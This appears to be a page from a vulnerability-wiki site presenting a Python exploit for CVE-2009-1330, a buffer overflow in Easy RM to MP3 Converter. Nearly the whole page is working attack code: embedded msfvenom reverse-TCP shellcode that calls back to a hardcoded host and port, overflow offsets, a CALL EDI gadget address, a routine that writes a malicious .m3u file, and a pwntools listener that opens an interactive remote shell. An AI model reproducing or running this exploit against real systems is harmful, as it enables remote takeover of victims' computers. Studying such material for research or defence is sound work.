PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
INFO
# CVE-2009-1330 Exploit for buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330) Based on: * pwntools * msfvenom / reverse\_tcp payload * ropper * x64dbg * Easy RM to MP3 Converter 2.7.3.700 Vulnerable app available at https://www.exploit-db.com/exploits/10374
EXP
#!/usr/bin/env python
#
# CVE-2009-1330 using:
# * pwntools
# * msfvenom / reverse_tcp payload
# * ropper
# * x64dbg
# * Easy RM to MP3 Converter 2.7.3.700
#
# Vulnerable app available at https://www.exploit-db.com/exploits/10374
from pwn import p32, listen
from threading import Thread
def generate_payload():
# EIP controlled on offset 82179
# EDI points to shellcode at offset 9926
# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LPORT=4444 -a x86
# LHOST=192.168.15.101 -f python --platform windows -b "\x00\x0a\x0d"
shellcode = "\x90" * 10 # small NOP slide
shellcode += "\xbf\x70\xf9\x1b\x1c\xda\xd0\xd9\x74\x24\xf4\x5e"
shellcode += "\x29\xc9\xb1\x52\x31\x7e\x12\x03\x7e\x12\x83\xb6"
shellcode += "\xfd\xf9\xe9\xca\x16\x7f\x11\x32\xe7\xe0\x9b\xd7"
shellcode += "\xd6\x20\xff\x9c\x49\x91\x8b\xf0\x65\x5a\xd9\xe0"
shellcode += "\xfe\x2e\xf6\x07\xb6\x85\x20\x26\x47\xb5\x11\x29"
shellcode += "\xcb\xc4\x45\x89\xf2\x06\x98\xc8\x33\x7a\x51\x98"
shellcode += "\xec\xf0\xc4\x0c\x98\x4d\xd5\xa7\xd2\x40\x5d\x54"
shellcode += "\xa2\x63\x4c\xcb\xb8\x3d\x4e\xea\x6d\x36\xc7\xf4"
shellcode += "\x72\x73\x91\x8f\x41\x0f\x20\x59\x98\xf0\x8f\xa4"
shellcode += "\x14\x03\xd1\xe1\x93\xfc\xa4\x1b\xe0\x81\xbe\xd8"
shellcode += "\x9a\x5d\x4a\xfa\x3d\x15\xec\x26\xbf\xfa\x6b\xad"
shellcode += "\xb3\xb7\xf8\xe9\xd7\x46\x2c\x82\xec\xc3\xd3\x44"
shellcode += "\x65\x97\xf7\x40\x2d\x43\x99\xd1\x8b\x22\xa6\x01"
shellcode += "\x74\x9a\x02\x4a\x99\xcf\x3e\x11\xf6\x3c\x73\xa9"
shellcode += "\x06\x2b\x04\xda\x34\xf4\xbe\x74\x75\x7d\x19\x83"
shellcode += "\x7a\x54\xdd\x1b\x85\x57\x1e\x32\x42\x03\x4e\x2c"
shellcode += "\x63\x2c\x05\xac\x8c\xf9\x8a\xfc\x22\x52\x6b\xac"
shellcode += "\x82\x02\x03\xa6\x0c\x7c\x33\xc9\xc6\x15\xde\x30"
shellcode += "\x81\xd9\xb7\x35\x34\xb2\xc5\x49\xa7\x1e\x43\xaf"
shellcode += "\xad\x8e\x05\x78\x5a\x36\x0c\xf2\xfb\xb7\x9a\x7f"
shellcode += "\x3b\x33\x29\x80\xf2\xb4\x44\x92\x63\x35\x13\xc8"
shellcode += "\x22\x4a\x89\x64\xa8\xd9\x56\x74\xa7\xc1\xc0\x23"
shellcode += "\xe0\x34\x19\xa1\x1c\x6e\xb3\xd7\xdc\xf6\xfc\x53"
shellcode += "\x3b\xcb\x03\x5a\xce\x77\x20\x4c\x16\x77\x6c\x38"
shellcode += "\xc6\x2e\x3a\x96\xa0\x98\x8c\x40\x7b\x76\x47\x04"
shellcode += "\xfa\xb4\x58\x52\x03\x91\x2e\xba\xb2\x4c\x77\xc5"
shellcode += "\x7b\x19\x7f\xbe\x61\xb9\x80\x15\x22\xd9\x62\xbf"
shellcode += "\x5f\x72\x3b\x2a\xe2\x1f\xbc\x81\x21\x26\x3f\x23"
shellcode += "\xda\xdd\x5f\x46\xdf\x9a\xe7\xbb\xad\xb3\x8d\xbb"
shellcode += "\x02\xb3\x87"
filler1 = 'A' * 9926
filler2 = 'B' * (82179 - len(filler1) - len(shellcode))
CALL_EDI_ADDR = p32(0x100304ec) # gadget from MSRMfilter03.dll
return filler1 + shellcode + filler2 + CALL_EDI_ADDR
def attack():
payload = generate_payload()
fname = "input.m3u"
f = open(fname, "w")
f.write(payload)
f.close()
print("File {} has been created.".format(fname))
print("Please use target software to open payload.")
if __name__ == "__main__":
# set target info
LHOST = "127.0.0.1"
LPORT = 4444
thread = Thread(target=attack)
thread.start()
listener = listen(port=LPORT)
listener.wait_for_connection()
listener.interactive()
thread.join()
PWNWIK.COM
